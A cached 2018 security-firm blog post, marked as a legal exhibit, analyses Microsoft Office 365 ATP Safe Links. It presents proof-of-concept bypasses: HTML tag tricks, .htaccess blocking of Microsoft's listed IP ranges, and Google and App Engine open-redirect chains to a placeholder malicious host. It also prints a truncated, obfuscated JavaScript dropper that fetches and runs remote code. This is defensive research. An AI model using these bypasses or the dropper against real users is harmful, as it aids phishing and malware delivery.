# EXHIBIT 19

This is Google's cache of https://blog.cryptron.ch/?tag=safe-links. It is a snapshot of the page as it appeared on Sep 28, 2019 21:31:54 GMT. The current page could have changed in the meantime. Learn more.

**Full version**   Text-only version   View source

Tip: To quickly find your search term on this page, press **Ctrl+F** or **⌘-F** (Mac) and use the find bar.



# CRYPTRON Security GmbH – Blog

**Schlagwort: Safe Links**

## Security analysis of Microsoft Office 365 Advanced Threat Protection (ATP)

**Abstract**

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection and includes features to safeguard your organization from harmful links in real-time. Microsoft ATP has rich reporting and URL trace capabilities that give administrators insight into the kind of attacks happening in your organization. Unkown or sophisticated attacks could be addressed in different ways. ATP safe links protect an environment when users click malicious links. ATP safe attachments protect against unsafe attachments and this security feature are offered as part of Office 365.

This report gives an introduction of the summary audit results of the content-filter checks and some bypass techniques for Microsoft ATP safe links feature in Office 365.



Architecture of Microsoft Office 365 Advanced Threat Protection ATP safe links

The security experts of CRYPTRON Security has been contracted to conduct a security audit during

the PoC period against Microsoft Advanced Threat Protection (ATP) in Office 365. The security audit with main-focus on ATP safe links research was published in 2018 including an audit summary report. (not public)

The security experts of CRYPTRON Security simulated an external targeted attacker. All security test realized undercontrolled conditions in the CRYPTRON Security Research Labs. The goal of this audit was:

- Testing the ATP safe link & safe attachment service on Windows 10 with Outlook 2016
- Quick ATP content-filter checks with new malware samples (e.g. ThunderShell, PoshC2)
- Identifying if a remote attacker could bypass the safe links & safe attachment feature
- Identifying other vulnerabilities and OWASP Top 10

**During this analysis the security experts of CRYPTRON Security discovered different ways to bypass Advanced Threat Protection (ATP) and Microsoft Safe Links in Office 365.**

Please note that this Blogpost documenting the current situation. The discovery of new vulnerabilities can lead to a different situation in only few weeks. Information about Microsoft Advanced Threat Protection (ATP) and Safe Links are also reported in this post.

## Summary content-filter checks in Microsoft Office 365 with ATP

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect an organization against unknown malware and viruses by providing robust zero-day protection, and includes features to safeguard your organization from harmful links in real-time. ATP has rich reporting and URL trace capabilities that give administrators insight into the kind ofattacks happening in your organization.

In an Office 365 ATP filtering-only scenario, ATP provides cloud-based email protection for your on-premises Exchange Server 2013 / 2016 environment, legacy Exchange Server versions, or any other on-premises SMTP email solution. In a hybrid deployment, ATP can be configured to protect your messaging environment and control mail routing when you have a mix of on-premises and cloud mailboxes with Exchange Online Protection for inbound email filtering.

Advanced Threat Protection (APT) across Windows 10 and Office on YouTube

Explore the security across your email and endpoints with the unified ATP (Advanced Threat Protection) experience across Office and Windows. See the spectrum of defense's across known and unknown attacks.

This content-filter line-up gives a short overview about the security robustness in Office 365 with ATP and sending basically malicious attachments. The content-filter Check was done in 2018 – overall severity of each finding is an evaluation of likelihood and system or business impact.

Majoritarian of malware was blocked by Antivirus or ATP filter mechanisms in Office 365.

Microsoft ATP filter check

Microsoft APT filter check with new attack tools

The ThunderShell attack framework was developed for penetration testing reasons and it is basedin

Python. It uses a Redis server for HTTPS communication between the implant and the server and PowerShell for execution of the implant on the target client and any other malicious scripts. The main advantage is that ThunderShell supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is called PoshC2 – also integral part of this audit. Both tools are using RC4 stream cipher encryption to obfuscate the client and command and control (C&C) server communication.

This screenshot demonstrate a remote shell on the test-client with ThunderShell during the this security research. The ps command is used to provide information about the currently running processes, including their process identification numbers (PIDs).



ThunderShell remote shell ps command

## Security analysis of Microsoft Safe Links in Office 365 with ATP

This section explain security analysis on the Safe Links feature of Microsoft Office 365 Advanced Threat Protection (ATP). Different attack vectors will be illustrated.

| | |
|---|---|
| **ATP Safe Links** | ATP's Safe Links feature proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed. |
| **ATP Safe Attachments** | Safe Attachments protects against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity |

| | is detected, the message is released for delivery to the mailbox. |
|---|---|

The goal of ATP safe links is to rewrite all URL's in email to a Microsoft URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URL's site content after a message is being scanned, hence there is a need of reclassification later.

> „For messsage in HTML – ATP Safe links identifies any links that uses the HREF attribute. For messages in plain text – ATP Safe Links uses custom logic to identifiy any text resembling a URL."
>
> — Source: www.microsoft.com

Replacing simple direct links in an email client like Outlook 2016 with links that are almost more than 300 characters long (!), seriously impacts the readability of plain text messages. Most of the emailmailing lists for professional administrators are sending there emails in plaintext format.

For example:



## Microsoft ATP Safe Links – PoC bypass with script tags

Microsoft Safe Links technology was recently launched by Microsoft through Office 365. The goal of this technology is to rewrite all URL's in email to a URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URL's site content after a message is being scanned.

This method should work currently in all email clients- from the web mail to mobile app on the smartphone. However, replacing a URL in HTML as text is difficult.

Bypassing Microsoft ATP Safe Links – PoC <a> tag example:

```
<a x=">" href="https://www.cryptron.ch">click me</a>
```

This method to bypass ATP Safe Links should work correctly in all email clients. From the web mail to your iPhone's Mail app. However, replacing a URL in HTML as text is difficult. Another demonstration to bypass ATP Safe Links is to use a <form> tag. Maybe it not work in all email clients.

Bypassing Microsoft ATP Safe Links – PoC<form> tag example:

```
<form action= "https:/github.com/mattias-ohlsson/eicar-standard-antivirus-test-
files/blob/master/eicar-standard-antivirus-test-file-adobe-acrobat-javascript-alert.pdf">
<input value="Please, click me"></form>
```







Open PDF in Chrome with reflected EICAR STRING

## Microsoft ATP Safe Links – PoC bypass with *.htaccess

The .htaccess (hypertext access) is the default name of Apache's directory level configuration file. It provides the ability to customize configuration directives defined in the main configuration file. With the .htaccess bypass technique, an attacker could simply block or redirect requests from the Microsoft ATP Safe Links service infrastructure.

Microsoft makes the ATP Safe Link IP ranges available online. An attacker needs only to block those IP ranges on the webserver with .htacess rules. These facilites include basic redirect functionality for instance if a 404 file not found error occurs or for more advanced functions. The following Microsoft data center IP addresses are used by Microsoft Exchange Online Protection (EOP) and Advanced Threat Protection (ATP) services lik Safe Links.

| Microsoft EOP IP ranges by region |||
|---|---|---|
| America | EMEA | APAC |
| 23.103.132.0/22<br>23.103.136.0/21<br>23.103.148.0/22<br>23.103.152.0/21<br>23.103.156.0/22<br>23.103.198.0/24<br>23.103.200.0/22<br>23.103.212.0/22<br>40.92.64.0/18<br>40.93.64.0/18<br>40.94.64.0/18<br>40.95.64.0/18<br>40.107.64.0/18<br>52.100.64.0/18<br>52.101.64.0/18<br>52.102.64.0/18<br>52.103.64.0/18<br>65.55.169.0/24<br>104.47.32.0/19<br>157.56.110.0/23<br>207.46.100.0/24<br>207.46.163.0/24<br>216.32.180.0/23<br><br>2a01:111:f400:7c00::/54 | 23.103.132.0/22<br>23.103.144.0/22<br>40.92.0.0/18<br>40.93.0.0/18<br>40.94.0.0/18<br>40.95.0.0/18<br>40.107.0.0/18<br>52.100.0.0/18<br>52.101.0.0/18<br>52.102.0.0/18<br>52.103.0.0/18<br>94.245.120.64/27<br>104.47.0.0/19<br>157.55.234.0/24<br>157.56.112.0/24<br>213.199.154.0/24<br>213.199.180.128/26<br><br>2a01:111:f400:7e00::/56<br>2a01:111:f400:fe00::/56 | 23.103.136.0/21<br>23.103.152.0/22<br>40.92.128.0/17<br>40.93.128.0/17<br>40.94.128.0/17<br>40.95.128.0/17<br>40.107.128.0/18<br>52.100.128.0/17<br>52.101.128.0/17<br>52.102.128.0/17<br>52.103.128.0/17<br>65.55.88.0/24<br>104.47.64.0/18<br>134.170.132.0/24<br>134.170.140.0/24<br>207.46.51.64/26<br><br>2a01:111:f400:7c00::/54 |

Microsoft Exchange Online and Advanced Threat Protection IP range

## Microsoft ATP Safe Links – PoC bypass with Google redirect parameter

A new phishing attack against Microsoft Office 365 customers uses Google's App Engine website to redirect email victims to download malicous files. Interesting for an attacker because this attack vector takes advantage of the trust level in Google's server to bypass ATP Safe Links filters. Security researcher and OWASP named it invalidated open redirect vulnerability.

There are multiple versions of the attack that use the same vulnerability but in this example, the victim received an incident email with a bit.ly (shorted-URL) to download a malforemd document. The URL redirects the victim to one of a few know malware or phishing websites or an information landing page from Google.

We will walk through the bypass techniques and the first level of misdirection is a well-know attack scenario. By replacing the URL with a bit.ly link to keep the victim to click on it. E-Mail filters are not fooled and will resolve basically URL-shortened links to find the target website. This attack method helps to bypass Microsoft ATP Safe Links.


Incoming Phishing email with URL-shortened link from bit.ly

The first part of the URL takes advantage of Google's trust in it's own domain when redirecting URLs from the search engine. For example if an attacker types in the browser the URL:

```
https://www.google.com/url?sa=D&q=https://www.cryptron.ch
```

Google redirects to whatever URL if a user puts in the „q=" parameter because attackers use this method to hide malicious website behind the trusted Google domain. Google responed by stopping the user with this message


Google redirect notice for www.cryptron.ch

However, if a user redirecting to a Google website there is no warning message. Therefore the URL https://www.google.com/url?sa=D&q=https://www.cryptron.ch flashes some seconds in the browser and then continues automatically. The attacker is basically taking advantage of Google's trust level and domain.

This section demonstrates another example but this time with a malicious link to malware. Of course an attacker can rename the malformed file *eicar-standard-antivirus-the-file-adobe-acrobate-javascript-alert.pdf* for hiding filenames on the attacker webserver. This method raises also the possibility to bypass ATP Safe Links and infect coprate users with Spear-Phishing attacks.

```
https://www.google.com/url?sa=D&q=https://www.cryptron.ch/eicar-standard-antivirus-test-
file-adobe-acrobate-javascript-alert.pdf
```

## ATP Safe Links – PoC bypass with Google App Engine

Google App Engine often referred to as GAE or simply Google App Engine is a web framework and cloud computing platform for devloping and hosting web applications in Google-managed data centers. Applications are sandboxed and run across multiple servers. Google App Engine offers automatic scaling for web applications – as the number of requets increases for an application Google's App Engine automatically allocates more ressource for the web application to handle the additional demand.

This screenshot demonstrates an ATP Safe Links bypass method with Google App Engine:


Google App Engine URL with Javascript payload

This open redirect vulnerability to bypass ATP Safe Links takes advantage of a website that takes redirect-links as a URL parameter but does not validate it before forwarding to the user. Many websites use redirect-links as a URL parameter and there is nothing inherently wrong with that. For example website gated content and Single Sign On (SSO) use this mechansim often with XML SOAP requets. It becomes a vulnerability once the website does not check the validity of the URL parameter and send the corporate user to a malicious website ormalfrmed file. Also drive by infection vectors are possibe with this method.

Unfortuately, Google's App Engine does not „check" the URL and the re-direct path – an attacker can put any link after „logout?continue=" in the attack URL:

```
https://www.google.com/url?
sa=D&q=https://appengine.google.com/_ah/logout%3Fcontinue%3Dhttp://malicious-
url.com/compliance.php%3Fmn%3D68720339
```

Google App Engine does not verify this link and redirect any user to the malicious website. The

embedded URL with compliance.php downloads an encrypted Javascript file called „compliant_details.js" that by default open the browser and execute the script locally on the system of the victim. To evade predictive and static analysis it builds own functions and variables on the fly – the Javascript script file contact an external webserver farm to download a TXT file containing binary code for executing with Wscript.exe on Microsoft Windows. An attack sample for macOS Mojave (Release 10.14.) are in progress.

```
function eqzQiVm(yfX, xuLS5l){return yfX.charAt(xuLS5l);}function nE9(fET){var nXsvk = "";
var yj6 = 0;for (yj6 = fET.length - 1; yj6 >= 0; yj6 -= 1){nXsvk += eqzQiVm(fET,
yj6);}return nXsvk;}function wQALF3(kT) {var mELmgzvmfK = "\x72";var bpq ="C"; var oz =
mELmgzvmfK + bpq;oz[3] = hcczz + "\x64\x65";var ij9 = oz[0] + oz[1] + oz[2] + oz[3];var
c24S = String;return c24S[ij9](kT);}function itNrDf1FI(j30i40){var yI = 0;var atlB =
0;while (yI < 99) {yI++;atlB += yI;}return "+"
==j30i40?(-5902+5964):"/"==j30i40?(-2523+2586):eRXgpo0.indexOf(j30i40);}function
sfrK(hUh){var ad87du1;var lN8;var wRyTg6;var rZl9yl;var bB987FsM;var u3qFYIWGlD =
wQALF3(lnpSYiYtV);lnpSYiYtV += 1;}eRXgpo0 += wQALF3(43, 47);var fnp = "=";var bl =
function(xWkLg) {var uYSEsio;try{uYSEsio = (new Function(xWkLg))(uYSEsio);return uYSEsio;}
catch(dEr) {return false;}};function yRk(d5AX) { return new ActiveXObject(d5AX);}try {
yRk("g8AeMp45n");}catch(vDQQxQ){var
nsWfGl="
ZoAUJYXIFExGl9CEDBBLEBRRlNUCksWBmYDPDcBScZWOOEWBkcmK9ADcglCKMUkCSAUbEdhCAgABhkSJBxyBxIQLD9
AOqAjD7VqHWBDG4cFeT8TMrqBKOBRW/TXfdpxT7T0hccATmxBOBToTm4zO+
```

Malicious file from compliance.php script with encrypted Javascript (attack) payload

## Conclusion

An organization keeps an archive of business emails going back over a decade. Emails are important for record keeping especially true for public institutions.

Microsoft ATP Safe Links service relies on Microsoft servers continusously running to scan and translate clicked URLs from millions of users. If Microsoft ever discontinues this service all of this Links in the email archives will become completely unusable. Links in emails themselves may not even contain all the information in the original URL – the original destination may not even be able to be deciphreable in the future. That does not make sense for record-keeping approach.

The European Union will start to enforce the General Data Protection Regulation (GDPR) since May 2018. In term of content, the EU GDPR leads to various key innovations such as the „right to forget", whereby data subjects can have their data breaches. New are that companies that violate the GDPR rules can be sanctioned with a maxium fine of 20 million euros or 4 percent of the annual turnover.

This secnario in Microsoft ATP Safe Links for Office 365 appears to suggest that the organization will receive reports with individually identifying information about every link clicked by every email user in the Cloud. Surely, there are some tradeoff's between privacy and security but this seems at least, like a significant movment away from the norms of privacy that employees currently expect – in addition, Microsoft ATP Safe Links can be bypassed with technical methods as described in this blog.

References:
https://docs.microsoft.com/en-us/office365/securitycompliance/atp-safe-links
https://docs.microsoft.com/en-us/office365/securitycompliance/office-365-atp
https://technet.microsoft.com/de-de/library/jj723119(v=exchg.150).aspx
https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32016R0679

https://www.edoeb.admin.ch/edoeb/en/home.html
http://www.wave16.com/2016/04/where-are-my-office-365-services-located_29.html
https://docs.microsoft.com/de-ch/office365/enterprise/urls-and-ip-address-ranges?redirectSourcePath=%252fde-de%252farticle%252fURLs-und-IP-Adressbereiche-von-Office-365-8548a211-3fe7-47cb-abb1-355ea5aa88a2
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://httpd.apache.org/docs/2.4/howto/htaccess.html
https://stackoverflow.com/questions/1020368/how-can-i-hide-or-encrypt-javascript-code
https://stackoverflow.com/questions/10916284/how-to-encrypt-decrypt-data-in-php

Dezember 12, 2018 / ATP, Exchagne Online, Google App Engine, Hacking, Microsoft, Office 365, Open redirect, OWASP, phishing, Safe Links / Schreibe einen Kommentar

CRYPTRON Security GmbH – Blog /